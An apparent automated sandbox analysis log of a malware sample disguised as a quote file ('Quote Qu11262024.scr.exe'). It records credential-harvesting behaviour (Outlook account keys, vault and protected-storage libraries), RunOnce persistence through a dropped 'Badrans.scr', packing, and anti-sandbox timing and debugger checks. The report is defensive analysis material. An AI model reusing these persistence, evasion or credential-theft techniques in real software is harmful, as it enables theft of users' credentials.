              Source: Quote Qu11262024.scr.exeReversingLabs: Detection: 52%
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile read: C:\Users\user\Desktop\Quote Qu11262024.scr.exeJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-33221
              Source: unknownProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\qjya"
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\addkeox"
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\dfjdeyijjf"
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\qjya"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\addkeox"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\dfjdeyijjf"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile written: C:\Windows\Resources\mineralrigste.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile opened: C:\Users\user\Desktop\Quote Qu11262024.scr.cfgJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Quote Qu11262024.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeUnpacked PE file: 6.2.Quote Qu11262024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeUnpacked PE file: 7.2.Quote Qu11262024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeUnpacked PE file: 8.2.Quote Qu11262024.scr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000000.00000002.2293548883.0000000004EEA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_738E1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_738E1A9C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_738E2F20 push eax; ret 0_2_738E2F4E
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142806 push ecx; ret 3_2_37142819
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044693D push ecx; ret 6_2_0044694D
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DB84
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044DB70 push eax; ret 6_2_0044DBAC
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00451D54 push eax; ret 6_2_00451D61
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0A4
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0044B090 push eax; ret 7_2_0044B0CC
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00451D34 push eax; ret 7_2_00451D41
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00444E71 push ecx; ret 7_2_00444E81
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00414060 push eax; ret 8_2_00414074
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00414060 push eax; ret 8_2_0041409C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00414039 push ecx; ret 8_2_00414049
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004164EB push 0000006Ah; retf 8_2_004165C4
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00416553 push 0000006Ah; retf 8_2_004165C4
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00416555 push 0000006Ah; retf 8_2_004165C4

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scrJump to dropped file
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scrJump to dropped file
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dllJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scrJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Badrans.scrJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004047CB
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI/Special instruction interceptor: Address: 53B412B
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI/Special instruction interceptor: Address: 1D0412B
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRDTSC instruction interceptor: First address: 5373AB0 second address: 5373AB0 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FDC54BA3CB3h 0x00000006 cmp bx, 0A3Eh 0x0000000b inc ebp 0x0000000c cmp eax, ebx 0x0000000e inc ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeRDTSC instruction interceptor: First address: 1CC3AB0 second address: 1CC3AB0 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FDC54D039D3h 0x00000006 cmp bx, 0A3Eh 0x0000000b inc ebp 0x0000000c cmp eax, ebx 0x0000000e inc ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeWindow / User API: threadDelayed 3669Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeWindow / User API: threadDelayed 5850Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeWindow / User API: foregroundWindowGot 1758Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI coverage: 4.6 %
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 1524Thread sleep count: 228 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 1524Thread sleep time: -114000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 4068Thread sleep count: 3669 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 4068Thread sleep time: -11007000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 4068Thread sleep count: 5850 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exe TID: 4068Thread sleep time: -17550000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_0040589C CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_004063D7 FindFirstFileA,FindClose,0_2_004063D7
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_004063D7 FindFirstFileA,FindClose,3_2_004063D7
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_004026FE FindFirstFileA,3_2_004026FE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_0040589C CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_0040589C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_371410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_371410F1
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37146580 FindFirstFileExA,3_2_37146580
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040AE51 FindFirstFileW,FindNextFileW,6_2_0040AE51
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407EF8
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407898
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00418981 memset,GetSystemInfo,6_2_00418981
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D64000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv953.tmp.6.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-4068
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-3899
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeAPI call chain: ExitProcess graph end nodegraph_7-34120
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_37142639
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_738E1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_738E1A9C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37144AB4 mov eax, dword ptr fs:[00000030h]3_2_37144AB4
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_3714724E GetProcessHeap,3_2_3714724E
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_37142B1C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_37142639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_37142639
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_371460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_371460E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Quote Qu11262024.scr.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Quote Qu11262024.scr.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\Quote Qu11262024.scr.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\qjya"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\addkeox"Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess created: C:\Users\user\Desktop\Quote Qu11262024.scr.exe "C:\Users\user\Desktop\Quote Qu11262024.scr.exe" /stext "C:\Users\user\AppData\Local\Temp\dfjdeyijjf"Jump to behavior
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQK\02
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerMl
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]@~Js
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQK\-
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQK\\y
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQK\
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
